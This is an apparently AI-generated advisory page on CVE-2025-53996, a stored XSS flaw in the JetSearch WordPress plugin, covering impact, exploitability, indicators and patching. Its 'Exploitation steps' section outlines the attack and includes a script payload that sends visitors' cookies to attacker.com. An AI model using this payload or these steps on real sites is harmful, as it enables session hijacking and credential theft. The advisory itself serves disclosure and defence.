CVE-2025-53996
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-53996 is a Stored Cross-Site Scripting (XSS) vulnerability in the Crocoblock JetSearch WordPress plugin, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). It affects all versions of JetSearch up to and including 3.5.10.1, with version 3.5.11 containing the fix. The vulnerability was reported on July 4, 2025, by researcher "stealthcopter" and publicly disclosed on July 16, 2025, by Patchstack. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack).

Technical details

The vulnerability is rooted in insufficient input sanitization and output escaping within the JetSearch plugin, allowing authenticated users with Contributor-level privileges or higher to inject and persistently store malicious JavaScript or HTML payloads (CWE-79). Because the injected content is stored server-side and rendered to site visitors, it qualifies as Stored XSS rather than reflected. Exploitation requires the attacker to have at minimum Contributor access to the WordPress site, and successful impact on victims requires a privileged user to view the affected content. No public proof-of-concept exploit code has been identified at this time (Patchstack).

Impact

Successful exploitation allows an attacker to inject persistent malicious scripts into WordPress pages, which execute in the browsers of site visitors and administrators. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, defacement, or redirection to malicious sites. The scope extends beyond the attacker's own session, as stored payloads affect all users who view the compromised content (Patchstack).

Exploitability

No active in-the-wild exploitation has been reported, and no public proof-of-concept exploit code is known to exist. The EPSS score is approximately 0.031% (0.000310), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running JetSearch plugin version 3.5.10.1 or earlier using tools like WPScan or Shodan with WordPress fingerprinting.
  2. Obtain Contributor access: Register or compromise a Contributor-level (or higher) account on the target WordPress site.
  3. Inject malicious payload: Using the Contributor account, create or edit content that interacts with the JetSearch plugin's input fields, embedding a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in an unsanitized parameter.
  4. Store the payload: Submit the content so the malicious script is persisted in the WordPress database via the JetSearch plugin.
  5. Trigger execution: Wait for a privileged user (e.g., administrator) or site visitor to view the affected page, causing the stored script to execute in their browser, enabling session hijacking or further exploitation (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to content creation/editing endpoints by Contributor-level accounts, particularly with unusual or encoded HTML/JavaScript in request bodies.
  • Database: WordPress wp_posts or related plugin tables containing unexpected <script> tags, event handlers (e.g., onerror, onload), or encoded JavaScript payloads in JetSearch-related fields.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages with JetSearch widgets, potentially indicating cookie or credential exfiltration.
  • File System: Unexpected modifications to plugin files in wp-content/plugins/jet-search/ that may indicate post-exploitation tampering.

Mitigation and workarounds

The vendor Crocoblock has released JetSearch version 3.5.11, which patches this vulnerability. All site administrators running JetSearch 3.5.10.1 or earlier should update to version 3.5.11 or later immediately. As a temporary measure, restricting Contributor-level user registration or tightening role permissions can reduce the attack surface. Patchstack users can enable auto-update for vulnerable plugins to receive protection automatically (Patchstack).

Community reactions

Wordfence included this vulnerability in its weekly WordPress vulnerability report for the period of July 14–20, 2025, providing broader community visibility (Wordfence). Red Packet Security also referenced it in a CISA vulnerability summary for the week of July 14, 2025. No significant vendor statements or notable researcher commentary beyond the Patchstack disclosure have been identified.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-15413CRITICAL10
  • link-factory
NoNoAug 13, 2026
CVE-2026-18146HIGH7.2
  • fluentform
NoYesAug 13, 2026
CVE-2026-3639MEDIUM6.4
  • password-protect-page
NoNoAug 13, 2026
CVE-2026-14332MEDIUM5.4
  • ecwid-shopping-cart
NoYesAug 13, 2026
CVE-2026-3835MEDIUM5.3
  • prevent-direct-access
NoYesAug 13, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management